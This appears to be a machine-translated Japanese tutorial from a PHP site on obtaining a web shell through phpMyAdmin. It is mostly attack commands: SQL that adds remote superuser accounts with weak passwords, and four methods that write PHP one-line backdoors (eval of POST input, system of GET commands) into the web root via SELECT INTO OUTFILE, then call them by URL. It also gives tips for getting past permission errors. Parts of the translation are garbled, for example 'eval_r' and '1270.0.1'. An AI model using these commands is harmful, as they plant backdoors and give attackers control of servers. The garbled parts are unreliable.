以下は、phpmyadmin の使用法チュートリアルの全員向けの要約です。 コラムphpmyadminシェルを入手してください。困っている友達に役立ちます!
PHPmyadmin がシェルの概要を取得します
PHPmyadmin がユーザー パスワードを変更します
localhost または上記の 1270.0.1 を直接クリックすると、ユーザー列が表示されます。クリックして変更します
スーパー ユーザーのguesssec パスワード ooxx を追加し、外部接続を許可します
GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;
root アカウントを作成してパスワードを設定できます
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
この方法で、root 外部リンク アカウントが作成され、パスワードは 123456、外部リンクには 123456 を使用します
4 つの古典的な方法シェルの使用方法:
方法 1:
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL ); INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval_r($_POST[7on])?>'); SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php 一句话连接密码:7on
方法 2:
读取文件内容: select load_file('E:/xamp/www/s.php'); 写一句话: select '<?php @eval_r($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php' cmd执行权限: select '<?php echo \'<pre class="brush:php;toolbar:false">\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
方法 3 :
JhackJ バージョン PHPmyadmin はシェル
Create TABLE study (cmd text NOT NULL); Insert INTO study (cmd) VALUES('<?php eval_r($_POST[cmd])?>'); select cmd from study into outfile 'E:/wamp/www/7.php'; Drop TABLE IF EXISTS study; <?php eval_r($_POST[cmd])?> -------------------------------------------------------------------------------- <?php @eval_r($_POST[cmd])?> CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 INSERT INTO study( cmd ) VALUES ('<?php eval_r($_POST[cmd])?>');# 影响列数: 1 SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1 DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
方法 4:
select load_file('E:/xamp/www/study.php'); select '<?php echo \'<pre class="brush:php;toolbar:false">\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
次に、Web サイトのディレクトリにアクセスします: http://www.2cto.com /study.php?cmd=dir
Phpmyadmin が文のエクスポート時に表示されます (エラーコード: 13 - 権限が拒否されました)
このディレクトリには権限がありません。上位レベルのディレクトリまたは下位レベルのディレクトリを試してください
これがうまくいかない場合は、NTS トラフィックを試してください
また、ディレクトリにも注意してください\
以上が概要 PHPmyadmin はシェルを取得しますの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。